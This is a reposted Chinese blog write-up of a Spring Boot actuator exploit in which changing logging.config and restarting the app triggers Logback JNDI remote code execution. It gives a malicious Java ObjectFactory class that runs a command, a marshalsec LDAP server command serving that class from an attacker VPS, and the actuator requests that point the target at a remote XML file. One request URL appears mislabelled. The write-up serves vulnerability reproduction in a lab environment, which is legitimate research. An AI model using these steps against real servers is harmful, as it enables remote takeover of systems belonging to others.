IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> Java知识库 -> restart logging.config logback JNDI RCE -> 正文阅读

[Java知识库]restart logging.config logback JNDI RCE

restart logging.config logback JNDI RCE

漏洞环境:

https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-restart-rce

漏洞复现:

  1. 在 VPS 上用 python3 -m http.server 80 命令开启 WEB 服务

  2. 编写实现 ObjectFactory 接口的恶意类,并上传至 VPS WEB 根目录

    import com.sun.org.apache.xalan.internal.xsltc.DOM;
    import com.sun.org.apache.xalan.internal.xsltc.TransletException;
    import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
    import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
    import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
    
    import javax.naming.Context;
    import javax.naming.Name;
    import java.io.File;
    import java.io.IOException;
    import java.util.Hashtable;
    
    public class CommandRaw extends AbstractTranslet implements javax.naming.spi.ObjectFactory{
        private static String cmd = "calc.exe";
    
        public CommandRaw() {
            String[] var1;
                var1 = new String[]{"cmd", "/C", cmd};
            try {
                Runtime.getRuntime().exec(var1);
            } catch (IOException var3) {
                var3.printStackTrace();
            }
    
        }
    
        public void transform(DOM var1, SerializationHandler[] var2) throws TransletException {
        }
    
        public void transform(DOM var1, DTMAxisIterator var2, SerializationHandler var3) throws TransletException {
        }
    
        @Override
        public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable environment) throws Exception {
            return new Object();
        }
    }
    
  3. java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://10.137.204.238:80/#CommandRaw 1389 命令在 VPS 上开启 LDAP 服务

  4. 访问 actuator/env 接口修改 logging.config 属性值

    http://127.0.0.1:9098/actuator/restart
    application/json
    
    {"name":"logging.config","value":"http://10.137.204.238/example02.xml"}
    
  5. 访问 actuator/restart 接口重启应用

    http://127.0.0.1:9098/actuator/restart
    application/json
    
    
    

漏洞原理:

通过访问 actuator/env 接口修改 logging.config 属性值,logging.config 属性值指定 Logback 组件的日志配置文件位置,然后重启应用触发目标访问搭建好的恶意 LDAP 服务,造成 LDAP 注入,跟 jolokia logback JNDI RCE 其实大差不差

注意点:

  1. 恶意类需要实现 ObjectFactory 接口
  2. VPS 上的 xml 文件内容语法不能为畸形,否则服务器会异常退出

Referenct:

https://github.com/LandGrey/SpringBootVulExploit

  Java知识库 最新文章
计算距离春节还有多长时间
系统开发系列 之WebService(spring框架+ma
springBoot+Cache(自定义有效时间配置)
SpringBoot整合mybatis实现增删改查、分页查
spring教程
SpringBoot+Vue实现美食交流网站的设计与实
虚拟机内存结构以及虚拟机中销毁和新建对象
SpringMVC---原理
小李同学: Java如何按多个字段分组
打印票据--java
上一篇文章      下一篇文章      查看所有文章
加:2021-12-10 10:55:44  更:2021-12-10 10:58:08 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/24 5:36:01-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码